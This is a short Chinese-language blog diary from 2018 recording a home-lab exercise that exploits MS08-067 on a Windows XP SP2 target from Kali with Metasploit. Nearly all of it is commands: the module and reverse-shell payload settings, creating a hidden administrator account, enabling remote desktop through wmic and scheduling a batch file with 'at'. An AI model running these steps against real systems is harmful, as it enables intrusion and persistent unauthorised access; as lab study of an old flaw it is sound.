msfconsole ms08_067 日記 2018.06.04

msfconsole ms08_067 日記 2018.06.04

smb ms08-067 漏洞 開啟遠程桌面嘗試

靶機 xp-sp2 簡化版安裝版 原版已開啟445,3389埠服務.

攻擊機 kali.

msfconsole //開始

use exploit/windows/smb/ms08_067_netapi //載入模塊

set payload generic/shell_reverse_tcp //載入攻擊載體

set rhost 192.168.2.102 //靶機ip

set lhost 192.168.2.103 //攻擊機ip

set target 10 //系統版本

run //運行

//溢出成功

net user admin admin /add //創建用戶

net localgroup administrators admin /add //提權

wmic PATH win32_terminalservicesetting WHERE (__Class!="") CALL SetAllowTSConnections 1 //執行<打開遠程桌面命令>時卡住,可能是payload的問題.

//再次嘗試

wmic /node:192.168.2.102 /user:admin /password:admin PATH win32_terminalservicesetting WHERE (__Class!="") CALL SetAllowTSConnections 1 //直接用其他windows機器cmd執行,拒絕訪問.因為是全新安裝的系統,開啟了簡單文件共享,net use無法連接.(直接取消靶機簡單共享這條可以執行).

//為了模擬真實環境用以下方法.

echo wmic PATH win32_terminalservicesetting WHERE (__Class!="") CALL SetAllowTSConnections 1 > c:1.bat //創建一個批處理用來打開遠程桌面

time //獲取系統時間

at 22:50 c:1.bat //定時執行批處理.(時間必須大於獲取到的時間)

//開啟遠程桌面連接成功.

總結:1,因為是新安裝系統,默認打開簡單文件共享,所以即便拿到許可權直接net use 也無法連接,同時"wmic /node:192.168.2.102 /user:admin /password:admin PATH win32_terminalservicesetting WHERE (__Class!="") CALL SetAllowTSConnections 1"也無法直接執行.

2,若不小心選錯target會造成靶機svchost.exe 溢出報錯,此時則必須重啟靶機才能重新連接(現實情況下可能意味著攻擊失敗).


推薦閱讀:

一個牛B男生的牛B日記,被雷翻了!
菜鳥升職日記
半飛秒近視眼手術小記

TAG:日記 | 計算機科學 | 網路安全 |